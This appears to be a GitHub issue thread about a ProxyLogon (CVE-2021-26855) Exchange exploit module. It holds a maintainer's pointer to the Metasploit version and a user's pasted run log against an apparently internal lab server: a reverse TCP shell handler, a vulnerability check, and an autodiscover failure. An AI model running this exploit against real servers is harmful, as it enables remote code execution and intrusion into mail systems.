Open 13Ragna37 opened 3 years ago
Hello,
The fully maintained version for this module is landed to Metasploit Framework, you must use this last (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_proxylogon_rce.rb).
If it does not work, please use set HTTPTRACE true
and open an issue on https://github.com/rapid7/metasploit-framework/issues with the trace log.
Hey Hey, can u say my what do i wrong?
if i use manuel the url for autodiscover it works with auth popup :/
[] Started reverse TCP handler on 0.0.0.0:4444 [] Executing automatic check (disable AutoCheck to override) [] Using auxiliary/scanner/http/exchange_proxylogon as check [+] https://192.168.1.2:443 - The target is vulnerable to CVE-2021-26855. [] Scanned 1 of 1 hosts (100% complete) [+] The target is vulnerable. [] https://192.168.1.2:443 - Attempt to exploit for CVE-2021-26855 [] https://192.168.1.2:443 - Retrieving backend FQDN over RPC request [] Internal server name (test-ex01.local) [] https://192.168.1.2:443 - Sending autodiscover request [-] Exploit aborted due to failure: not-found: No Autodiscover information was found [*] Exploit completed, but no session was created.